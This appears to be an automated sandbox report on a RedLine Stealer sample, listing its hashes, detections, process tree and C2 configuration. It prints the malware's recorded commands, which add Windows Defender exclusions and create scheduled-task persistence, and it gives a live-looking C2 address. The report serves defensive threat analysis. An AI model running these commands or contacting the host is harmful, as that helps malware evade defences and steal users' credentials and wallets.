Edit tour

Windows Analysis Report
w4XFffGDz1.exe

Overview

General Information

Sample name:	w4XFffGDz1.exe renamed because original name is a hash value
Original sample name:	2185ecde5380054ad075b7a25ae0ea51.exe
Analysis ID:	1457840
MD5:	2185ecde5380054ad075b7a25ae0ea51
SHA1:	caa1b832574fc3050af5f97b6deabc21398b5c47
SHA256:	e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

w4XFffGDz1.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\w4XFffGDz1.exe" MD5: 2185ECDE5380054AD075B7A25AE0EA51)

PO.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)

powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AJzHYZtQIb.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe MD5: 86F98523CEB67DF5CC3431A839F63134)

schtasks.exe (PID: 8028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AJzHYZtQIb.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ba:$a4: get_ScannedWallets 0x12218:$a5: get_ScanTelegram 0x1303e:$a6: get_ScanGeckoBrowsersPaths 0x10e5a:$a7: <Processes>k__BackingField 0xed6c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1078e:$a9: <ScanFTP>k__BackingField
00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x139ea:$a4: get_ScannedWallets 0x12848:$a5: get_ScanTelegram 0x1366e:$a6: get_ScanGeckoBrowsersPaths 0x1148a:$a7: <Processes>k__BackingField 0xf39c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10dbe:$a9: <ScanFTP>k__BackingField
0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1451a:$a4: get_ScannedWallets 0x2c33a:$a4: get_ScannedWallets 0x13378:$a5: get_ScanTelegram 0x2b198:$a5: get_ScanTelegram 0x1419e:$a6: get_ScanGeckoBrowsersPaths 0x2bfbe:$a6: get_ScanGeckoBrowsersPaths 0x11fba:$a7: <Processes>k__BackingField 0x29dda:$a7: <Processes>k__BackingField 0xfecc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27cec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x118ee:$a9: <ScanFTP>k__BackingField 0x2970e:$a9: <ScanFTP>k__BackingField
Process Memory Space: PO.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO.exe PID: 7532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO.exe PID: 7532	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PO.exe PID: 7532	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x26629:$a4: get_ScannedWallets 0x52ecd:$a4: get_ScannedWallets 0x254d0:$a5: get_ScanTelegram 0x51d74:$a5: get_ScanTelegram 0x262b2:$a6: get_ScanGeckoBrowsersPaths 0x52b56:$a6: get_ScanGeckoBrowsersPaths 0x24163:$a7: <Processes>k__BackingField 0x50a07:$a7: <Processes>k__BackingField 0x21696:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x4df3a:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x23a97:$a9: <ScanFTP>k__BackingField 0x5033b:$a9: <ScanFTP>k__BackingField
Process Memory Space: PO.exe PID: 8068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO.exe PID: 8068	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PO.exe PID: 8068	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x7eb00:$a4: get_ScannedWallets 0x7d9a7:$a5: get_ScanTelegram 0x7e789:$a6: get_ScanGeckoBrowsersPaths 0x7c63a:$a7: <Processes>k__BackingField 0x79b6d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x7bf6e:$a9: <ScanFTP>k__BackingField
Process Memory Space: AJzHYZtQIb.exe PID: 8164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AJzHYZtQIb.exe PID: 8164	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AJzHYZtQIb.exe PID: 8164	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x24d84:$a4: get_ScannedWallets 0x23c2b:$a5: get_ScanTelegram 0x24a0d:$a6: get_ScanGeckoBrowsersPaths 0x228be:$a7: <Processes>k__BackingField 0x1fdf1:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x221f2:$a9: <ScanFTP>k__BackingField
Process Memory Space: AJzHYZtQIb.exe PID: 5404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AJzHYZtQIb.exe PID: 5404	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.PO.exe.3c18d70.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c18d70.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c00f50.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c18d70.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c00f50.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c18d70.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
7.2.PO.exe.3c00f50.4.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c00f50.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
14.2.PO.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.PO.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.PO.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
14.2.PO.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
7.2.PO.exe.3c18d70.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c18d70.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c18d70.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c18d70.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
7.2.PO.exe.3c00f50.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c00f50.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c00f50.4.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c00f50.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x284ab:$v2_2: get_ScanVPN 0x2854e:$v2_2: get_ScanFTP
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.PO.exe.3c00f50.4.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Virustotal: Detection: 58%	Perma Link
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Virustotal: Detection: 58%	Perma Link

Multi AV Scanner detection for submitted file

Source: w4XFffGDz1.exe	ReversingLabs: Detection: 68%
Source: w4XFffGDz1.exe	Virustotal: Detection: 67%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: w4XFffGDz1.exe

Joe Sandbox ML: detected

Source: w4XFffGDz1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: w4XFffGDz1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001986E8 FindFirstFileExA,

